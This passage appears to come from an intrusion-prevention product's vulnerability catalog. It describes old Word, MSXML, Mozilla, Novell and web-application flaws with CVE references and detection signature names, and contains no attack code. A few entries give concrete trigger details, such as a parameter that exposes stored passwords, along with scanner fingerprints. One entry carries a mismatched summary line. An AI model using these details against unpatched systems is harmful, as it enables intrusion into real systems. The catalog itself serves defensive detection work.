HTTP_Microsoft-Windows-Shell-MSHTA-Script-Execution
E-Mail_BS-Microsoft-Windows-Shell-MSHTA-Script-Execution
File-OLE_Microsoft-Windows-Shell-MSHTA-Script-Execution

References:

CVE-2005-0063
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0063

BID-13132
http://www.securityfocus.com/bid/13132

MS05-016
http://technet.microsoft.com/security/bulletin/MS05-016

HTTP-Microsoft-Word-Crafted-Sprm-Structure-Stack-Memory-Corruption

About this vulnerability:

Microsoft Word Crafted Sprm Structure Stack Memory Corruption

Risk:

Moderate

First detected in:

sgpkg-ips-260-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Word

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Microsoft Word products. The flaw is due to improper handling of crafted record size in Word documents. An attacker can exploit this vulnerability by persuading the target user to open a malicious Word document. Successful attack could allow for arbitrary code injection and execution with privileges of the currently logged on user. An attack targeting this vulnerability can result in the injection and execution of code. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. Any code injected will be executed within the security context of the currently logged in user. In the case of an unsuccessful code execution attack, affected product will terminate resulting in the loss of any unsaved data from the current session.

Situation:

HTTP_SS-Microsoft-Word-Crafted-Sprm-Structure-Stack-Memory-Corruption
File-OLE_Microsoft-Word-Crafted-Sprm-Structure-Stack-Memory-Corruption

References:

CVE-2008-4837
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4837

BID-32584
http://www.securityfocus.com/bid/32584

MS08-072
http://technet.microsoft.com/security/bulletin/MS08-072

HTTP-Microsoft-Word-Formatted-Disk-Pages-Table-Memory-Corruption

About this vulnerability:

Memory corruption vulnerability in Microsoft Word

Risk:

High

First detected in:

sgpkg-ips-88-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Word

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Microsoft Word. The vulnerability can be exploited by delivering a malicious Word document to the target user who opens it with the affected application. This leads to a DoS terminating the vulnerable appalication or arbitrary code execution with the privileges of the currently logged in user.

Situation:

HTTP_SS-Microsoft-Word-Formatted-Disk-Pages-Table-Memory-Corruption
File-OLE_Microsoft-Word-Formatted-Disk-Pages-Table-Memory-Corruption

References:

CVE-2006-6561
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6561

BID-21589
http://www.securityfocus.com/bid/21589

MS07-014
http://technet.microsoft.com/security/bulletin/MS07-014

HTTP-Microsoft-Word-RTF-Mismatched-Dpendgroup-Buffer-Overflow

About this vulnerability:

Microsoft Word RTF Mismatched dpendgroup Buffer Overflow

Risk:

Moderate

First detected in:

sgpkg-ips-260-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office

Type:

Malfunction

Description:

There exists a buffer overflow vulnerability in Microsoft Word products. The flaw is due to a boundary error when processing RTF documents that contain mismatched dpendgroup control words. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted RTF file. Successful exploitation can lead to arbitrary code execution within the security context of the currently logged on user. An attack targeting this vulnerability can result in the injection and execution of code. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. Any code injected will be executed within the security context of the currently logged in user. In the case of an unsuccessful code execution attack, affected product will terminate resulting in the loss of any unsaved data from the current session.

Situation:

HTTP_SS-Microsoft-Word-RTF-Mismatched-Dpendgroup-Buffer-Overflow
File-RTF_Microsoft-Word-RTF-Mismatched-Dpendgroup-Buffer-Overflow

References:

CVE-2008-4030
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4030

BID-32642
http://www.securityfocus.com/bid/32642

MS08-072
http://technet.microsoft.com/security/bulletin/MS08-072

HTTP-Microsoft-Word-RTF-Stylesheet-Control-Word-Memory-Corruption

About this vulnerability:

Microsoft Word RTF Stylesheet Control Word Memory Corruption

Risk:

Moderate

First detected in:

sgpkg-ips-260-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Office

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Microsoft Word products. The flaw is due to an index error when processing RTF documents that contain more than six \stylesheet control words. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted RTF file. Successful exploitation can lead to arbitrary code execution within the security context of the currently logged on user. An attack targeting this vulnerability can result in the injection and execution of code. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. Any code injected will be executed within the security context of the currently logged in user. In the case of an unsuccessful code execution attack, affected product will terminate resulting in the loss of any unsaved data from the current session.

Situation:

HTTP_SS-Microsoft-Word-RTF-Stylesheet-Control-Word-Memory-Corruption
HTTP_SS-Microsoft-Word-RTF-Stylesheet-Control-Word-Memory-Corruption-DOS
File-RTF_Microsoft-Word-RTF-Stylesheet-Control-Word-Memory-Corruption-DOS
File-RTF_Microsoft-Word-RTF-Stylesheet-Control-Word-Memory-Corruption

References:

CVE-2008-4031
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4031

BID-32594
http://www.securityfocus.com/bid/32594

MS08-072
http://technet.microsoft.com/security/bulletin/MS08-072

HTTP-Microsoft-Word-Section-Table-Array-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Microsoft Word

Risk:

High

First detected in:

sgpkg-ips-97-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Word

Type:

Buffer Overflow

Description:

There is a stack buffer overflow vulnerability in Microsoft Word. The vulnerability can be exploited by delivering a malicious Word document with a malformed PLCFSED record inside the Table Stream to the target user who opens it with the affected application. This leads to a denial of service condition terminating the vulnerable appalication or arbitrary code execution with the privileges of the currently logged in user.

Situation:

E-Mail_BS-Microsoft-Word-Section-Table-Array-Buffer-Overflow
HTTP_Microsoft-Word-Section-Table-Array-Buffer-Overflow
File-OLE_Microsoft-Word-Section-Table-Array-Buffer-Overflow

References:

CVE-2007-0515
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0515

BID-22225
http://www.securityfocus.com/bid/22225

OSVDB-31900
http://www.osvdb.org/31900

MS07-014
http://technet.microsoft.com/security/bulletin/MS07-014

HTTP-Microsoft-Xml-Core-Services-ActiveX-Control-Code-Exectution

About this vulnerability:

A vulnerability in Microsoft XML Core Services allows code execution

Risk:

Moderate

First detected in:

sgpkg-ips-90-1314

Last changed:

sgpkg-ips-1772-5242

Platform:

Generic

Software:

Microsoft XML Core Services

Type:

Malfunction

Description:

There is a vulnerability in the Microsoft XML Core Services (XMLHTTP) ActiveX component. A malicious HTML page can be used to execute code in the context of the local user.

Situation:

HTTP_SS-Microsoft-Xml-Core-Services-ActiveX-Control-Code-Execution
File-Text_Microsoft-Xml-Core-Services-ActiveX-Control-Code-Execution-With-Open
File-Text_Microsoft-Xml-Core-Services-ActiveX-Control-Code-Execution

References:

CVE-2006-5745
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5745

BID-20915
http://www.securityfocus.com/bid/20915

MS06-071
http://technet.microsoft.com/security/bulletin/MS06-071

HTTP-Microsoft-Xml-Core-Services-Memory-Corruption-Vulnerability

About this vulnerability:

A vulnerability in Microsoft XML Core Services

Risk:

Moderate

First detected in:

sgpkg-ips-117-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Integer Overflow

Description:

There exists an integer overflow vulnerability in Microsoft XML Core Services. The vulnerability is caused due to lack of parameter check in the substringData method of various MSXML ActiveX controls. A remote attack can exploit these vulnerability by enticing the target user to open a crafted web page, potentially causing arbitrary code to be injected and executed in the security context of the current user.

Situation:

HTTP_Core-Services-And-OLE-Automation-SubstringData-Memory-Corruption
File-Text_Core-Services-And-OLE-Automation-SubstringData-Memory-Corruption

References:

CVE-2007-2223
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2223

BID-25301
http://www.securityfocus.com/bid/25301

MS07-042
http://technet.microsoft.com/security/bulletin/MS07-042

HTTP-MiniWeb-Negative-Contentlength-DoS

About this vulnerability:

Negative Content-Length causes Denial of Service

Risk:

Low

First detected in:

sgpkg-ips-111-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MiniWeb

Type:

Buffer Overflow

Description:

MiniWeb HTTP server crashes if a POST request contains a negative Content-Length value

Situation:

HTTP_CSH-Negative-Content-Length-Value

References:

CVE-2007-3159
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3159

BID-24375
http://www.securityfocus.com/bid/24375

OSVDB-37185
http://www.osvdb.org/37185

HTTP-Miva-Htmlscript-Directory-Traversal

About this vulnerability:

Server readable files can be disclosed due to directory traversal vulnerability.

Risk:

Low

First detected in:

sgpkg-ips-3-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Miva htmlscript

Type:

Directory Traversal

Description:

The interpreter is vulnerable to directory traversal attacks using relative paths. Any file the server process can access can be read by this method.

Situation:

HTTP_CSU-Miva-Htmlscript-Directory-Traversal

References:

CVE-1999-0264
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0264

BID-2001
http://www.securityfocus.com/bid/2001

HTTP-Morfeus-Scanner

About this vulnerability:	Morfeus Scanner Attack Tool
Risk:	Moderate
First detected in:	sgpkg-ips-100-1314
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Morfeus
Type:	Browser
Description:	Morfeus Scanner is an attack tool that is designed to exploit website-related vulnerabilities. Morfeus identiefies itself as "User-Agent: Morfeus Fucking Scanner".
Situation:	HTTP_CSH-Morfeus-Scanner-Usage

HTTP-Mozilla-Command-Line-Url-Command-Execution

About this vulnerability:

Mozilla start-up script command execution vulnerability

Risk:

High

First detected in:

sgpkg-ips-40-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux; HP-UX

Software:

Mozilla based browsers

Type:

Malfunction

Description:

Mozilla based web browsers suffer from a shell command execution vulnerability. The browsers are usually launched in UNIX environments from command line with a script, and the URL to be opened can be passed as a parameter. The start-up script does not validate the input sufficiently, failing in remote back-tick characters from the URL. Third party software, especially mail clients, use the command line script to launch a browser when URLs are selected. This allows remote attackers to execute arbitrary commands by tricking the victim to view an URL, for example, by sending an email containing a specially-crafted URL.

Situation:

E-Mail_BS-Mozilla-Command-Line-Url-Command-Execution
File-Text_Mozilla-Command-Line-Url-Command-Execution

References:

CVE-2005-2968
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2968

BID-14888
http://www.securityfocus.com/bid/14888

HTTP-Mozilla-CSS-Moz-Binding-Cross-Site-Scripting

About this vulnerability:

Mozilla browsers -moz-binding CSS property XSS vulnerability

Risk:

Low

First detected in:

sgpkg-ips-58-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox; Mozilla Suite

Type:

Cross-site Scripting

Description:

Mozilla based browsers suffer from a cross site scripting (XSS) vulnerability in the handling of a CSS property. The browsers are able to handle Extensible Binding Language (XBL), which can be used to describe bindings that can be attached to elements in other documents. Bindings can be attached to elements by using the CSS -moz-binding property. Due to a flaw in the browser, domain based restrictions are not imposed on resources referenced through the Bindings mechanism. The vulnerability allows attackers to access information specific to different domains, for example to steal cookies from specific sites.

Situation:

HTTP_Mozilla-CSS-Moz-Binding-Cross-Site-Scripting
File-Text_Mozilla-CSS-Moz-Binding-Cross-Site-Scripting

References:

CVE-2006-0496
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0496

BID-16427
http://www.securityfocus.com/bid/16427

OSVDB-22924
http://www.osvdb.org/22924

HTTP-Mozilla-Firefox-CSS-Letter-Spacing-Heap-Overflow

About this vulnerability:

Mozilla Firefox CSS letter-spacing heap overflow vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-65-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Suite; Mozilla Firefox; Mozilla SeaMonkey; Mozilla Thunderbird

Type:

Buffer Overflow

Description:

Mozilla Suite, Firefox, SeaMonkey and Thunderbird have a heap based buffer overflow vulnerability. The vulnerability can be exploited by persuading a user to view a specially crafted HTML page with a vulnerable product, causing a DoS or allowing non-privileged code execution.

Situation:

HTTP_Mozilla-Firefox-CSS-Letter-Spacing-Heap-Overflow
File-Text_Mozilla-Firefox-CSS-Letter-Spacing-Heap-Overflow

References:

CVE-2006-1730
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1730

BID-17516
http://www.securityfocus.com/bid/17516

HTTP-Mozilla-Firefox-FirefoxURL-URI-Handler-Registration-Code-Execution

About this vulnerability:

Code execution vulnerability in Mozilla Firefox

Risk:

High

First detected in:

sgpkg-ips-114-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Mozilla Firefox

Type:

Malfunction

Description:

There is a code execution vulnerability in Mozilla Firefox. Opening a crafted web page with malicious arguments passed to the vulnerable "FirefoxURL://" handler with Internet Explorer may lead to arbitrary JavaScript code execution with Chrome privileges.

Situation:

HTTP_SS-Mozilla-Firefox-FirefoxURL-URI-Handler-Registration-Code-Execution
File-Text_Mozilla-Firefox-FirefoxURL-URI-Handler-Registration-Code-Execution

References:

CVE-2007-3670
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3670

BID-24837
http://www.securityfocus.com/bid/24837

OSVDB-38017
http://www.osvdb.org/38017

HTTP-Mozilla-Firefox-Privilege-Escalated-JavaScript-Execution

About this vulnerability:

Privilege escalation vulnerability with JavaScript execution in Mozilla Firefox

Risk:

Moderate

First detected in:

sgpkg-ips-66-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox; Mozilla Suite

Type:

Malfunction

Description:

Mozilla Firefox has a vulnerability in the handling of security restrictions when jar or view-source schemes are used in HTML. If javascript URL is supplied inside these schemes it is possible that the script bypasses the normal security restrictions.

Situation:

HTTP_Mozilla-Firefox-Privilege-Escalated-JavaScript-Execution
File-Text_Mozilla-Firefox-Privilege-Escalated-JavaScript-Execution

References:

CVE-2005-1531
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1531

BID-13641
http://www.securityfocus.com/bid/13641

HTTP-Mozilla-IDN-Encoded-Hostname-BOF

About this vulnerability:

Mozilla-based browsers IDN encoded hostname buffer overflow

Risk:

High

First detected in:

sgpkg-ips-38-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla based browsers

Type:

Buffer Overflow

Description:

Mozilla-based browsers do not handle IDN encoded hostnames properly. A specially-crafted hostname can be used to overflow a buffer, allowing arbitrary code execution.

Situation:

HTTP_Mozilla-IDN-Encoded-Hostname-BOF
File-Text_Mozilla-IDN-Encoded-Hostname-BOF

References:

CVE-2005-2871
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2871

BID-14784
http://www.securityfocus.com/bid/14784

OSVDB-19255
http://www.osvdb.org/19255

HTTP-Mozilla-Products-Frame-Comment-Objects-Manipulation-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft XML Core Services allows code execution

Risk:

Moderate

First detected in:

sgpkg-ips-90-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox; Mozilla SeaMonkey

Type:

Malfunction

Description:

There is a vulnerability in the Mozilla Firefox and SeaMonkey browsers. A malicious HTML page can be used to execute code within the context of the current user.

Situation:

HTTP_SS-Mozilla-Products-Frame-Comment-Objects-Manipulation-Memory-Corruption
File-Text_Mozilla-Products-Frame-Comment-Objects-Manipulation-Memory-Corruption

References:

CVE-2006-6504
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6504

BID-21668
http://www.securityfocus.com/bid/21668

HTTP-Mozilla-Products-Malformed-Gif-Buffer-Overflow

About this vulnerability:

Heap-based buffer overflow vulnerability in the way Mozilla products parse Netscape extension 2 blocks in GIF image files

Risk:

Moderate

First detected in:

sgpkg-ips-114-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Firefox; Mozilla Suite; Mozilla Thunderbird

Type:

Buffer Overflow

Description:

There is a heap-based buffer overflow vulnerability in the way Mozilla products parse Netscape extension 2 blocks in GIF images. When the vulnerable product is used to render a malicious GIF image, the application may crash or freeze, creating a denial of service condition, or arbitrary code may be executed with the privileges of the currently logged in user.

Situation:

HTTP_SS-Mozilla-Products-Malformed-Gif-Buffer-Overflow
File-GIF_Mozilla-Products-Malformed-Gif-Buffer-Overflow

References:

CVE-2005-0399
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0399

BID-12881
http://www.securityfocus.com/bid/12881

HTTP-Mozilla-Products-Regular-Expressions-Heap-Corruption

About this vulnerability:

Heap-based buffer overflow vulnerability in Mozilla based browsers

Risk:

Moderate

First detected in:

sgpkg-ips-81-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla based browsers

Type:

Buffer Overflow

Description:

There is a heap-based buffer overflow vulnerability in Mozilla based browsers. The vulnerability can be exploited by persuading a target user to view a malicious HTML page with a vulnerable browser. This causes a DoS or arbitrary non-privileged code execution on the victim's computer.

Situation:

HTTP_Mozilla-Products-Regular-Expressions-Heap-Corruption
File-Text_Mozilla-Products-Regular-Expressions-Heap-Corruption

References:

CVE-2006-4566
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4566

BID-20042
http://www.securityfocus.com/bid/20042

OSVDB-28844
http://www.osvdb.org/28844

HTTP-Mozilla-Products-SVG-Layout-Engine-Index-Parameter-Memory-Corruption

About this vulnerability:

Memory corruption vulnerability in Mozilla Foundation's family of browser products

Risk:

High

First detected in:

sgpkg-ips-111-2032

Last changed:

sgpkg-ips-1729-5242

Platform:

Generic

Software:

Mozilla Firefox; Mozilla SeaMonkey; Mozilla Thunderbird

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Mozilla Foundation's family of browser products. The vulnerability can be exploited remotely to execute arbitrary code in the context of the currently logged-in user.

Situation:

HTTP_SS-Mozilla-Products-SVG-Layout-Engine-Index-Parameter-Memory-Corruption
File-TextId_Mozilla-Products-SVG-Layout-Engine-Index-Parameter-Memory-Corruption

References:

CVE-2007-2867
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2867

BID-24242
http://www.securityfocus.com/bid/24242

OSVDB-35134
http://www.osvdb.org/35134

HTTP-Mozilla-Suite-DOM-Property-Code-Execution-Vulnerability

About this vulnerability:

Mozilla Suite DOM property code execution vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-65-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mozilla Suite; Mozilla Firefox

Type:

Malfunction

Description:

Mozilla Suite and Firefox have a vulnerability concerning the JavaScript eval method. The vulnerability can be exploited by persuading a user to view a specially crafted HTML page allowing arbitrary code execution with the privileges of the user running the vulnerable browser.

Situation:

HTTP_Mozilla-Suite-DOM-Property-Code-Execution
File-Text_Mozilla-Suite-DOM-Property-Code-Execution

References:

CVE-2005-1532
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1532

BID-13645
http://www.securityfocus.com/bid/13645

HTTP-MPM-Guestbook-Pro-Header-Php-Code-Injection

About this vulnerability:

MPM Guestbook Pro allows arbitrary script code execution

Risk:

Moderate

First detected in:

sgpkg-ips-19-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MPM Guestbook Pro

Type:

PHP Injection

Description:

MPM Guestbook Pro, a php guestbook system, allows remote attackers to execute arbitrary php code and view arbitrary code on the server. The file top.php uses "include($header)", allowing an attacker to specify $header. There also exists a file disclosure vulnerability on the same variable, allowing remote attackers to view arbitrary files on the server by supplying a relative path to $he

Situation:

HTTP_CSU-MPM-Guestbook-Pro-Header-Php-Code-Injection

References:

BID-12266
http://www.securityfocus.com/bid/12266

HTTP-Muieblackcat-Scanner

About this vulnerability:	Muieblackcat Scanner Attack Tool
Risk:	Moderate
First detected in:	sgpkg-ips-505-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Muieblackcat
Type:	Browser
Description:	Muieblackcat Scanner is an attack tool that is designed to exploit website-related PHP vulnerabilities. Muieblackcat sometimes identifies itself by starting the scan with a request to URI "/muieblackcat" and then starts requesting "setup.php" files.
Situation:	HTTP_CSU-Muieblackcat-Scanner-Usage

HTTP-Multiple-Content-Encodings

About this vulnerability:	Multiple content encodings in a HTTP message
Risk:	Moderate
First detected in:	sgpkg-ips-531-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Input Validation
Description:	Content-Encoding header in HTTP is used to indicate additional content codings that have been applied to HTTP message body. Multiple content encoding may be used, but certain combinations of content encodings are not normally used and are interpreted differently by different web browsers.
Situation:	HTTP_SHS-Multiple-Gzip-Or-Deflate-Content-Encodings

HTTP-MyBB-Domecode-Function-Php-Code-Execution

About this vulnerability:

Php code execution vulnerability in the domecode function in MyBB

Risk:

High

First detected in:

sgpkg-ips-70-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MyBB

Type:

Code Injection

Description:

There is a PHP code execution vulnerability in the domecode function in MyBB due to insufficient input validation of the username value. A successful exploitation of this vulnerability leads to arbitrary PHP code execution with the privileges of the web server.

Situation:

HTTP_CSU-MyBB-Domecode-Function-Php-Code-Execution
HTTP_CRL-MyBB-Domecode-Function-Remote-Php-Code-Execution

References:

CVE-2006-2908
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2908

BID-18396
http://www.securityfocus.com/bid/18396

OSVDB-26216
http://www.osvdb.org/26216

HTTP-MySQL-MaxDB-Webtool-WebDBM-Database-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in MySQL MaxDB Webtool's WebDBM module

Risk:

High

First detected in:

sgpkg-ips-79-1314

Last changed:

sgpkg-ips-1350-5242

Platform:

Windows

Software:

MaxDB

Type:

Buffer Overflow

Description:

MaxDB Webtool, a web-based application interface bundled with MaxDB, suffers from a buffer overflow vulnerability due to not checking the input length for the "database" argument. The database name is copied into a buffer 18 bytes long, allowing remote attackers to easily overflow the buffer via an HTTP request specifying a long "database" argument. A successful attack allows arbitrary code execution with the Webtool process's privileges.

Situation:

HTTP_CRL-MySQL-MaxDB-Webtool-WebDBM-Database-Buffer-Overflow

References:

CVE-2006-4305
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4305

BID-19660
http://www.securityfocus.com/bid/19660

HTTP-Nagios-Content-Length-Handling-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Nagios

Risk:

Moderate

First detected in:

sgpkg-ips-66-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

Nagios

Type:

Buffer Overflow

Description:

Nagios has a buffer overflow vulnerability in the handling of crafted Content-Length HTTP header fields. A remote attacker exploiting this vulnerability succesfully is able to execute arbitrary code on the target system in the context of the running web server.

Situation:

HTTP_CSH-Negative-Content-Length-Value
HTTP_CSH-Excessively-Large-Content-Length-Value

References:

CVE-2006-2162
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2162

BID-17879
http://www.securityfocus.com/bid/17879

OSVDB-25434
http://www.osvdb.org/25434

HTTP-NCTsoft-NCTAudioFile2-ActiveX-Control-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in NCTsoft NCTAudioFile2 ActiveX control

Risk:

Moderate

First detected in:

sgpkg-ips-93-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

NCTsoft NCTAudioStudio; NCTsoft NCTAudioEditor; NCTsoft NCTDialogicVoice

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the NCTsoft NCTAudioFile2 ActiveX control. The control is included in several products from the vendor. A malicious, crafted web page may be used to execute code in the context of the current user, leading to system compromise or denial of service.

Situation:

HTTP_SS-NCTsoft-NCTAudioFile2-ActiveX-Control-Buffer-Overflow
File-Text_NCTsoft-NCTAudioFile2-ActiveX-Control-Buffer-Overflow

References:

CVE-2007-0018
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0018

BID-23892
http://www.securityfocus.com/bid/23892

BID-22196
http://www.securityfocus.com/bid/22196

HTTP-Net.Commerce-orderdspc.d2w-SQL-Injection-Vulnerability

About this vulnerability:

SQL injection in IBM Net.Commerce.

Risk:

Critical

First detected in:

sgpkg-ips-5-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

IBM Net.Commerce; IBM WebSphere Commerce Suite

Type:

SQL Injection

Description:

IBM's Net.Commerce contains vulnerable macros, which won't validate a user's input, allowing attacker to inject SQL into the request to acquire elevated privileges. It is possible use these privileges to execute arbitrary commands in the system.

References:

CVE-2001-0319
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0319

BID-2350
http://www.securityfocus.com/bid/2350

HTTP-Netscape-Enterprise-Server-Index-Disclosure-Vulnerability

About this vulnerability:

Netscape Enterprise Server Index Disclosure Vulnerability

Risk:

Low

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Netscape Enterprise Server

Type:

Malfunction

Description:

Netscape Enterprise Server will disclose directory contents to unauthorized users if web publishing is enabled.

Situation:

HTTP_CS-Index-Directory-Disclosure-Attempt

References:

CVE-2001-0250
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0250

BID-2285
http://www.securityfocus.com/bid/2285

HTTP-Netscape-Enterprise-Server-Revlog-DoS

About this vulnerability:

Netscape Enterprise Server Revlog DoS

Risk:

Low

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Netscape Enterprise Server

Type:

Malfunction

Description:

The Netscape Enterprise Server an be crashed with certain commands if web publishing is enabled.

Situation:

HTTP_CS-Netscape-Enterprice-Server-Revlog-DoS

References:

CVE-2001-0251
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0251

BID-2294
http://www.securityfocus.com/bid/2294

HTTP-Netwin-CWMail-Buffer-Overflow

About this vulnerability:

Buffer-overflow vulnerability in Netwin CWMail

Risk:

Moderate

First detected in:

sgpkg-ips-3-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

NetWin CWMail

Type:

Buffer Overflow

Description:

Netwin CWMail has a buffer-overflow vulnerability in the way it handles data with the 'item' parameter. A remote attacker is able to use this vulnerability to execute arbitrary code on the server.

Situation:

HTTP_CS-Netwin-CWMail-ShellCode-Detect

References:

CVE-2002-0273
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0273

BID-4093
http://www.securityfocus.com/bid/4093

HTTP-Newsletter-Zws-Ulevel-Information-Disclosure

About this vulnerability:

Newsletter Zws allows users to view all logins and passwords

Risk:

Moderate

First detected in:

sgpkg-ips-5-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

Zaireweb Solutions Newsletter ZWS

Type:

Malfunction

Description:

Newsletter ZWS allows remote users to view all login names and passwords by calling the admin.php script's list_user operation with ulevel parameter set to 1 (admin).

References:

CVE-2004-0621
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0621

BID-10605
http://www.securityfocus.com/bid/10605

HTTP-Novell-Convert-Bas-Dir-Traversal

About this vulnerability:

Novell convert.bas Directory Traversal

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1636-5242

Platform:

Novell NetWare

Software:

<os>

Type:

Directory Traversal

Description:

The Novell convert.bas program can be exploited to read any file on the system by using directory traversal.

References:

CVE-1999-0175
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0175

HTTP-Novell-eDirectory-HTTP-Headers-Denial-Of-Service

About this vulnerability:

A resource exhaustion vulnerability in Novell eDirectory

Risk:

Moderate

First detected in:

sgpkg-ips-153-2032

Last changed:

sgpkg-ips-1589-5242

Platform:

Generic

Software:

Novell eDirectory

Type:

Resource Starvation

Description:

There is a resource exhaustion vulnerability in Novell eDirectory. The vulnerability can be triggered by sending a crafted HTTP request that contains more than one Connection header, or a Connection header with more than one value to the vulnerable server, causing a denial of service condition.

Situation:

HTTP_CS-Novell-eDirectory-HTTP-Headers-Denial-Of-Service

References:

CVE-2008-0927
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0927

BID-28757
http://www.securityfocus.com/bid/28757

OSVDB-44035
http://www.osvdb.org/44035

HTTP-Novell-eDirectory-HTTP-Server-Redirection-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in the iMonitor HTTP server component of Novell eDirectory products

Risk:

High

First detected in:

sgpkg-ips-83-1314

Last changed:

sgpkg-ips-1581-5242

Platform:

Generic

Software:

Novell eDirectory

Type:

Buffer Overflow

Description:

There is a stack-based buffer overflow vulnerability in Novell eDirectory. The iMonitor HTTP server component does not properly handle HTTP requests that contain an excessively long Host header field. A successful exploitation of this vulnerability leads to a DoS or arbitrary code execution with the privileges of the service process, which is System by default on Windows machines.

Situation:

HTTP_CSH-Overly-Long-Host-Header-Field
HTTP_CSH-Binary-Data-In-Long-Host-Header-Field
POP3_Novell-eDirectory-CVE-2006-5478
HTTP_CSH-Novell-eDirectory-CVE-2006-5478

References:

CVE-2006-5478
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5478

BID-20655
http://www.securityfocus.com/bid/20655

HTTP-Novell-Groupwise-Messenger-Accept-Language-Header-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Novell GroupWise Messenger

Risk:

High

First detected in:

sgpkg-ips-70-1314

Last changed:

sgpkg-ips-1582-5242

Platform:

Generic

Software:

Novell GroupWise Messenger

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the handling of the Accept-Language header field value in Novell GroupWise Messenger. A successful exploitation of this vulnerability leads to a DoS or arbitrary code execution with the privileges of the System user.

References:

CVE-2006-0992
